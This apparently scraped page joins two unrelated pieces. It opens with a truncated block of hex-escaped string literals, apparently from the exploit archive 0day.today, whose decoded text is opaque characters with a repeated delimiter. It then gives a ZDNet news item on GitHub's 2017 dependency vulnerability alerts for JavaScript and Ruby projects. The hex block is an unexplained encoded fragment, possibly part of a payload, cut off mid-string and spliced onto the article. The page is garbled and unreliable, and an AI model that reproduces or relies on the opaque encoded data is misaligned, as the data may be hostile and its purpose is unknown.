"\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45" "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34" "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55" "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51" "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48" "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72" "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41" "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47" "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d" "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25" "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71" "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d" "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32" "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b" "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d" "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d" "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41" "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e" "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51" # 0day.today [2017-11-17] # Source: 0day.today
-
GitHub's new service will help developers clean up vulnerable project dependencies. Devlopers can view the security alerts in the repository's dependency graph, which can be accessed from 'Insights'. Image: GitHub Development platform GitHub has launched a new service that searches project dependencies in JavaScript and Ruby for known vulnerabilities and then alerts project owners if it finds any. The new service aims to help developers update project dependencies as soon as GitHub becomes aware of a newly announced vulnerability. GitHub will identify all public repositories that use the affected version of the dependency. Projects under private repositories will need to opt into the vulnerability-detection service. The alerts should have a big impact on security, given that GitHub now hosts nearly 70 million repositories, with projects that rely on dependent software packages or software libraries that frequently do not get updated when new flaws are disclosed. The alerts form part of GitHub's so-called 'dependency graph', which helps developers monitor projects that their code depends on, and lists a project's various Ruby and JavaScript dependencies. Developers can view the security alerts in the repository's dependency graph, which can be accessed from 'Insights'. The alerts are only sent to project owners and others with admin access to repositories. The company promises never to publicly disclose vulnerabilities for a specific repository. Users can choose to receive the alerts by email, web notifications or the GitHub interface. GitHub's is also using machine learning to suggest fixes from the GitHub community. The alerts are based on public vulnerabilities in Ruby gems and NPM, the package manager for Node.js, on MITRE's Common Vulnerabilities and Exposures (CVE) List. GitHub will add Python to its vulnerability alert service in 2018. Python, Ruby, and JavaScript are among the top five languages on GitHub, along with Java and PHP. It appears the alerts will be limited to flaws with CVE IDs initially. However, as GitHub notes many publicly disclosed flaws don't have CVE IDs. It suggests future improvements will help it identify more vulnerabilities as it collects more data about them. Source: zdnet.com
-